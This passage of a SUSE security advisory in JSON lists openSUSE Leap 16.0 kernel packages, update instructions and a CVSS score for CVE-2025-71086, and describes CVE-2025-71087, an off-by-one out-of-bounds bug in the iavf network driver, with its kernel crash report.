"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71086",
"url": "https://www.suse.com/security/cve/CVE-2025-71086"
},
{
"category": "external",
"summary": "SUSE Bug 1256625 for CVE-2025-71086",
"url": "https://bugzilla.suse.com/1256625"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71086"
},
{
"cve": "CVE-2025-71087",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71087"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: fix off-by-one issues in iavf_config_rss_reg()\n\nThere are off-by-one bugs when configuring RSS hash key and lookup\ntable, causing out-of-bounds reads to memory [1] and out-of-bounds\nwrites to device registers.\n\nBefore commit 43a3d9ba34c9 (\"i40evf: Allow PF driver to configure RSS\"),\nthe loop upper bounds were:\n i \u003c= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX\nwhich is safe since the value is the last valid index.\n\nThat commit changed the bounds to:\n i \u003c= adapter-\u003erss_{key,lut}_size / 4\nwhere `rss_{key,lut}_size / 4` is the number of dwords, so the last\nvalid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `\u003c=`\naccesses one element past the end.\n\nFix the issues by using `\u003c` instead of `\u003c=`, ensuring we do not exceed\nthe bounds.\n\n[1] KASAN splat about rss_key_size off-by-one\n BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800\n Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63\n\n CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary)\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n Workqueue: iavf iavf_watchdog_task\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xb0\n print_report+0x170/0x4f3\n kasan_report+0xe1/0x1a0\n iavf_config_rss+0x619/0x800\n iavf_watchdog_task+0x2be7/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\n Allocated by task 63:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7f/0x90\n __kmalloc_noprof+0x246/0x6f0\n iavf_watchdog_task+0x28fc/0x3230\n process_one_work+0x7fd/0x1420\n worker_thread+0x4d1/0xd40\n kthread+0x344/0x660\n ret_from_fork+0x249/0x320\n ret_from_fork_asm+0x1a/0x30\n\n The buggy address belongs to the object at ffff888102c50100\n which belongs to the cache kmalloc-64 of size 64\n The buggy address is located 0 bytes to the right of\n allocated 52-byte region [ffff888102c50100, ffff888102c50134)\n\n The buggy address belongs to the physical page:\n page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50\n flags: 0x200000000000000(node=0|zone=2)\n page_type: f5(slab)\n raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000\n raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc\n \u003effff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc\n ^\n ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc\n ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
